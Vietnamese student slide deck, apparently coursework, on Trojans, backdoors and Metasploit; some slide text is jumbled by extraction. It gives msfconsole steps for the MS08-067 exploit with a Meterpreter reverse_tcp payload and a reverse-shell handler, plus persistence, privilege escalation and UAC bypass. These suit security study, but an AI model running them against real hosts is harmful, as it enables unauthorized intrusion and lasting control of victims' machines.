Professional Documents
Culture Documents
HÀNH
TR O JAN-BACK D OO R
Giáo viên hướng dẫn: Đặng Thế Hùng
LÝ DO CHỌN ĐỀ TÀI
Với sự trợ giúp của Trojan, một kẻ tất công có thể dễ dàng
truy cập dữ liệu:
CÓ 2 LOẠI:
● Tinh vi, khó phát hiện ● Thủ tục trong quá trình sản xuất
của nhà phát triển
● Sử dụng gói phần mềm Rootkit
để giữ “cửa hậu” luôn mở và
● Nhằm mục đích dự phòng
che giấu hoạt động trên internet
CÁC DẠNG VÀ CÁCH HOẠT
ĐỘNG CỦA TROJAN
Các dạng Trojan cơ bản:
CHIA
TẦNG KHI SẺ ẨN
VẬT LÝ CÁC FILE CHẠY FILE TRONG
WEB
TRAO ĐÍNH FILE BỊ QUA CÁC
ĐỘC
ĐỔI DỮ KÈM NHIỄM Net ỨNG
LIỆU BIOS DỤNG
CÁC PORT SỬ DỤNG BỞI CÁC
TROJAN PHỔ BIẾN
Giới thiệu về Metasploit Tìm hiểu về phương thức Các lỗi nguy hiểm đã
Frameworks và ứng dụng Payload Meterpreter được khai thác
METASPLOIT
Metasploit là một dự án bảo mật
máy tính cung cấp các thông tin
về vấn đề lỗ hổng bảo mật cũng
như giúp đỡ về kiểm tra thâm
nhập và phát triển hệ thống phát
hiện tấn công mạng
METASPLOIT
● Console interface
● Web interface
● Global Enviroment
● Temporary Enviroment
METASPLOIT
FRAMEWORKS
Cấu hình exploit Lựa chọn mục tiêu Thực thi exploit
đã chọn
1 3 5
● Lỗi BYPASS UAC: với tài UAC, viết tắt của User Account Control, là
khoản của người quản trị, các một tính năng bảo mật của Windows giúp
ứng dụng vẫn bị giới hạn như
ngăn chặn các thay đổi trái phép đối với hệ
những tài khoản thường khác
bởi tiện ích UAC (User Access điều hành. Những thay đổi này có thể được bắt
Control) đầu bởi các ứng dụng, người dùng,virus hoặc
các dạng phần mềm độc hại khác.
PHÂN TÍCH
03 Xem xét và đánh giá một trong các trường
hợp tấn công
PHÂN TÍCH
Kiểu này chỉ tấn công trong LAN, vì đây là kiểu thực hiện
tạo kết nối từ máy Hacker đi ra Victim nên IP của Victim
phải là IP private. Một vài trường hợp IP wan cũng được
nhưng là hy hữu.
KIỂU 1: TẤN CÔNG 1 MÁY CỤ THỂ BỊ
MỘT LỖI CỤ THỂ TRÊN HỆ ĐIỀU HÀNH
Với kiểu tấn công này thì phải biết chính xác IP của Victim. Các Options cần set:
Msfconsole
Search “mã lỗ hổng” là để tìm đường dẫn code tấn công
Use “đường dẫn tới code tấn công vừa search được”
Set PAYLOAD windows/meterpreter/reverse_tcp là tấn công chiếm Win luôn set option
này
Set LHOST “IP Kali”
Set RHOST “IP Victim” là phải biết IP Victim
Set LPORT “Local port muốn set” là Port trên kali để thực hiện kết nối
Option RPORT được sét sẵn do lỗi giao thức nào thì tấn công trên port giao thức đó.
Vậy với các options trên đã đủ để thực hiện 1 kết nối tới Victim (chú ý: đây là kết nối
từ máy Hacker đến máy victim chính vì thế phải set RHOST)
KIỂU 1: TẤN CÔNG 1 MÁY CỤ THỂ BỊ
MỘT LỖI CỤ THỂ TRÊN HỆ ĐIỀU HÀNH
MS 08_067
Msfconsole
msf > search ms08_067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.73.100
msf exploit(ms08_067_netapi) > set RHOST “IP Victim”
msf exploit(ms08_067_netapi) > exploit
KIỂU 2: REVERSE CONNECTION-TẤN
CÔNG QUA MẠNG INTERNET
Với kiểu tấn công này thì Victim sẽ tự tạo 1 kết nối về Hacker (bị
động-Hacker phải chờ Victim làm 1 điều gì đó trên máy của họ để
kích hoạt kết nối về Hacker). Vậy nên ko cần biết IP của Victim và
ko quan tâm đến Firewall trên Victim có on hay off vì đây là kết nối
từ Victim đi ra, mà firewall chặn chiều in. Và cũng có thể bypass
được hệ thống Firewall biên khi mở port 80, 443 vì Hacker hoàn
toàn chủ động định nghĩa Port trên máy Hacker để cho Victim thực
hiện reverse connect.
KIỂU 2: REVERSE CONNECTION-TẤN
CÔNG QUA MẠNG INTERNET
Use exploit/multi/handler ⇒ với kiểu reverse shell thì luôn luôn set như
thế này
Set PAYLOAD windows/meterpreter/reverse_tcp
Set LHOST “IP của Hacker”
Set LPORT “port mà Hacker định nghĩa trong reverse shell” ⇒ nếu
không set thì default 4444
Exploit
PERSISTENT BACKDOORS
Sau khi chúng ta đã chiếm quyền điều khiển hệ thống công việc không
kém phần quan trọng là để lại backdoor để duy trì kết nối cho lần sau ngay
cả khi hệ thống bị reboot hoặc shutdown hoặc bị vá lỗi chúng ta cũng vẫn
chiếm quyền truy cập trở lại nhờ vào module persistence.
Nâng quyền, leo thang bậc quyền hay chiếm quyền root là một
bước cần thiết sau khi khai thác xâm nhập được vào mục tiêu.
Việc này nhằm để kiểm soát được toàn bộ hệ thống của nạn nhân
rồi từ đó ta có thể thực hiện thay đổi dữ liệu, cài backdoor, xóa
dấu vết mà không bị giới hạn bởi quyền.
Đối với các máy tính Linux thì quyền cao nhất chính là
quyền root, còn Windows chính là quyền Administrator.
THỰC HÀNH
04 Tiến hành thử nghiệm cuộc tấn công xâm
nhập
THANKS!
Đàm Chí Nguyên
Cổ Ngọc Minh Huy
Thái Công Lập
Hồ Thanh Duy